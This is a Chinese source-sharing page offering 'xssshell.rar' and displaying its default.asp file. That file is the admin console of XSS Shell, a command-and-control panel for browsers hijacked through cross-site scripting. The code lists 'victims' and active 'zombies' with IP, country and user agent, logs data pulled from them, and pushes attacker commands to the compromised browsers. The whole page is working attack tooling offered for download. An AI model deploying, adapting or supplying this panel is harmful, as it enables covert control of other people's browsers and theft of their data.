开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
default.asp
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:5k
源码类别:

破解

开发平台:

ASP/ASPX

default.asp:源码内容
  1. <%
  3. '09/08/2006
  4. ' - Started
  5. '
  6. ' 15/08/2006
  7. ' - Working alpha
  8. '
  9. '18/08/2006
  10. ' New UI
  11. '
  12. '31/10/2006
  13. ' Now supports activity and shows active zombies and drops non-active ones
  14. ' Multiple victim support with send and save
  15. ' Faster victim notification
  18. ' TODO;
  19. ' - Log commands locally for analyze later
  20. ' + Build up connection interface 
  21. ' - Command Shell
  22. ' / Command Interface
  23. ' + Implement AJAX for interface (low pr)
  26. %>
  27. <!--#include file="db.asp" -->
  28. <%
  29. protected()
  31. Dim CallType
  32. CallType = fm_Qnstr("c")
  34. 'Call only logs
  35. Select Case CallType 
  36. Case 1
  37. Call Logs()
  39. Case 2
  40. Call Victims()
  42. End Select
  44. '// Poor man's AJAX Calls
  45. If CallType > 0 Then Response.End
  47. Title = "XSS Shell Admin"
  49. %>
  50. <!--#include file="header.asp" -->
  51. <%
  52. Call ShowCommands()
  53. %>
  54. <div id="victims">
  55. <div id="victimsUpdater">
  56. <%Victims()%>
  57. </div>
  58. </div>
  59. <div id="logHolder">
  60. <h2>Logs</h2>
  61. <div id="log"></div>
  62. </div>
  64. <%
  65. Call Viewer()
  69. '---------------------------------------------------------------------------
  70. ' Helpers
  71. '---------------------------------------------------------------------------
  73. Sub Victims()
  75. Dim RsVic
  76. getRs RsVic, "SELECT TOP " & MAX_VICTIM & " Victim.IP, Victim.ID, Victim.VictimID, RequestTime, RawUserAgent, Data FROM Victim, VictimDetail WHERE VictimDetail.VictimID = Victim.VictimID AND lastseen >  DATEADD(""s"",-" & Activity & ",Now) ORDER BY Victim.ID DESC"
  78. Response.Write "<h2>Victims</h2>" 
  79. Dim viclist, Starter
  81. While Not RsVic.EOF 
  83. PrintVictim(RsVic)
  84. If Starter Then viclist = viclist & ","
  85. viclist = viclist & RsVic("VictimID")
  87. Starter = True
  88. RsVic.MoveNext
  89. Wend
  91. Response.Write "[" & viclist
  93. fmKill RsVic
  95. End Sub
  97. Sub PrintVictim(ByVal Rs)
  99. Dim Data, ProxyData
  101. ProxyData = Rs("Data")
  102. If ProxyData <> "" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, "<br />")
  104. Data = Data & "<strong>Victim ID : </strong>" & Rs("VictimID") & "<br>"
  105. Data = Data & "<div class=code>" & fm_Encode(Rs("RawUserAgent")) & "</div>"
  106. If ProxyData <> "" Then Data = Data & "<div class=code>" & ProxyData & "</div>"
  108. Dim Checked 
  109. Checked = false
  111. With Response
  112. .Write "<div class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)"" help=""" & Data & """ >"
  113. .Write "<img src=""mg/flags/" & GetCountry(Rs("IP")) & ".png"" alt=""" & GetCountry(Rs("IP")) & """ width=""20"" height=""13"" > "
  114. .Write Rs("IP") & " / " & Rs("VictimID") & "</div>"
  115. End With
  117. 'Response.Write "<ul><a href=""showdata.asp?i=" & Rs("ID") & "&m=1"">" & Rs("IP") & "</a> - <em>" & Rs("RequestTime") & "</em></ul>"
  118. End Sub
  121. ' COMMANDS BOX
  122. '---------------------------------------------------------------------------
  123. ' Show Available Commands
  125. Sub ShowCommands()
  127. %>
  128. <div id="commands">
  129. <h2>Commands</h2>
  130. <%
  131. Dim i
  132. For i = 0 To UBound(Commands) Step 3
  134. Response.Write "<div id=""cmd" & i & """ class=""commandl"" onmouseover=""hi(this)"" onmouseout=""lo(this)""><a href=""javascript:;"" onclick=""sendCommand('" & Commands(i+1) & "');new Effect.Highlight(document.getElementById('cmd" & i & "'), '#ff0000')"">" & fm_Encode(Commands(i)) & "</a><br>" & Commands(i+2) & "</div>"
  136. Next 
  137. %>
  138. <hr /><strong>Parameters :</strong> <br />
  139. <textarea name="params" id="params" style="width:98%;height:80px"></textarea>
  141. <input type="hidden" id="victims" value="" />
  142. <hr />
  143. </div>
  144. <%
  146. End Sub
  150. ' VIEWER BOX
  151. '---------------------------------------------------------------------------
  152. ' Offline Content Viewer iframe 
  154. Sub Viewer()
  156. %>
  157. <div id="offlinebrowser">
  158. <h2>Viewer</h2>
  159. <iframe name="offlinebrw" id="offlinebrw" src="javascript:document.write('.');document.close()"></iframe>
  160. </div>
  161. <%
  163. End Sub
  166. ' LOGS BOX
  167. '---------------------------------------------------------------------------
  168. ' Show recent logs from victims
  170. Sub Logs()
  172. Dim RsLog
  173. getRs RsLog, "SELECT TOP " & DEFAULT_REC & " ID, Data, Type, AttackID, Shown FROM Log ORDER BY ID DESC"
  176. ' Response.Write "<h2>Logs : " & Minute(Now) & ":" & Second(Now) & "</h2>"
  177. Response.Write "<ol>"
  179. While Not RsLog.EOF 
  181. PrintLog(RsLog)
  183. RsLog.MoveNext
  184. Wend
  186. Response.Write "</ol>"
  188. fmKill RsLog
  190. End Sub
  192. ' Print and Format Logs
  193. Function PrintLog(ByVal Rs)
  195. Dim Value 
  196. If Rs("Data") <> "" Then
  197. Value = fm_Encode(Rs("Data"))
  198. Value = Replace(Value, "%7Bn%7D", "<br />")
  199. Value = Replace(Value, "%3Atrue", "%3A<strong>true</strong>")
  201. Else
  202. Value = Rs("AttackID") & "..."
  204. End If
  206. Dim CSSname
  208. '// Pushed
  209. If Rs("Shown") = 1 Then
  210. CSSname = "pushed"
  211. End If
  213. If Rs("Data") <> "" Then
  214. CSSname = "done"
  215. End If
  219. Value = "<span class=""" & CSSName & """>" & Value & "</span>"
  221. If Rs("Type") = HTMLPAGE Then
  222. Value = "<a href=""showdata.asp?i=" & Rs("ID") & """ target=""offlinebrw"">HTML - (be careful for backfire!)</a>"
  223. End If
  225. Response.Write "<li>" & Value & "</li>"
  227. End Function
  229. %>
  231. <!--#include file="footer.asp" -->